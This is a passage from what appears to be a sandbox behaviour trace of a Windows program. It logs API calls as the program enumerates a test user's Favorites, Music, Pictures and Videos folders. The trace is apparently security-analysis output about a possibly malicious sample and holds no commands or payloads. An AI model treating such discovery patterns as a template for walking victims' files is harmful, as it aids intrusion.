hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5ae690, ftCreationTime.dwHighDateTime=0x1d4c94a, ftLastAccessTime.dwLowDateTime=0x744b50f0, ftLastAccessTime.dwHighDateTime=0x1d4d049, ftLastWriteTime.dwLowDateTime=0x744b50f0, ftLastWriteTime.dwHighDateTime=0x1d4d049, nFileSizeHigh=0x0, nFileSizeLow=0x18ef7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wdJqAyQOW.ots", cAlternateFileName="WDJQAY~1.OTS")) returned 0 [0056.422] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269b08 | out: hHeap=0x660000) returned 1 [0056.422] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\") returned="Links\\" [0056.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0056.422] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.422] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.422] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.422] PathFindFileNameW (pszPath="") returned="" [0056.422] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b930 | out: hHeap=0x660000) returned 1 [0056.423] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.423] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.423] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0056.423] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0056.423] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0056.423] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b5f0 | out: hHeap=0x660000) returned 1 [0056.423] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.423] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\") returned="Microsoft Websites\\" [0056.423] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0056.423] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.423] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.423] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ebd0 | out: hHeap=0x660000) returned 1 [0056.423] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.423] PathFindFileNameW (pszPath="") returned="" [0056.423] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.425] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0056.425] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.425] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0056.425] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0056.425] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0056.425] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0056.425] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0056.425] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0056.426] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.426] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257668 | out: hHeap=0x660000) returned 1 [0056.426] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\") returned="MSN Websites\\" [0056.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0056.426] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.426] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.427] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.427] PathFindFileNameW (pszPath="") returned="" [0056.427] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.428] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.428] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0056.428] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0056.428] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0056.428] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0056.428] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0056.428] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0056.428] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0056.428] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.429] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.429] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="Windows Live\\" [0056.429] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\") returned="Favorites\\" [0056.429] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.429] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.429] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.429] PathFindFileNameW (pszPath="") returned="" [0056.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.431] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.431] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.432] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.432] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\") returned="eIv9rDB\\" [0056.432] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0056.432] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.432] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.432] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.432] PathFindFileNameW (pszPath="") returned="" [0056.432] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f5fb960, ftCreationTime.dwHighDateTime=0x1d4d2cd, ftLastAccessTime.dwLowDateTime=0x6871d5a0, ftLastAccessTime.dwHighDateTime=0x1d4d342, ftLastWriteTime.dwLowDateTime=0x6871d5a0, ftLastWriteTime.dwHighDateTime=0x1d4d342, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.433] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.433] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.433] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\") returned="m4--j\\" [0056.433] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="Music\\" [0056.433] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.433] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.433] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.433] PathFindFileNameW (pszPath="") returned="" [0056.433] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9fc49d0, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0x8b298c90, ftLastAccessTime.dwHighDateTime=0x1d4d546, ftLastWriteTime.dwLowDateTime=0x8b298c90, ftLastWriteTime.dwHighDateTime=0x1d4d546, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.433] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.433] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.434] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\") returned="Pt3T5YLjsfWTS8bTn\\" [0056.434] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0056.434] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.434] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.434] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.434] PathFindFileNameW (pszPath="") returned="" [0056.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527b5a80, ftCreationTime.dwHighDateTime=0x1d4d17d, ftLastAccessTime.dwLowDateTime=0xf393b510, ftLastAccessTime.dwHighDateTime=0x1d4d0a2, ftLastWriteTime.dwLowDateTime=0xf393b510, ftLastWriteTime.dwHighDateTime=0x1d4d0a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.434] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.434] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.434] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\") returned="27nF\\" [0056.434] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0056.434] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.434] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.434] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.434] PathFindFileNameW (pszPath="") returned="" [0056.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8d443130, ftCreationTime.dwHighDateTime=0x1d4cddd, ftLastAccessTime.dwLowDateTime=0x27e7be0, ftLastAccessTime.dwHighDateTime=0x1d4cbe5, ftLastWriteTime.dwLowDateTime=0x27e7be0, ftLastWriteTime.dwHighDateTime=0x1d4cbe5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.435] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.435] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.435] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\") returned="jYsvlZ\\" [0056.435] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0056.435] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0056.435] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0056.435] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0056.435] PathFindFileNameW (pszPath="") returned="" [0056.435] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jYsvlZ\\*", lpFindFileData=0x9f4fba4 | out: 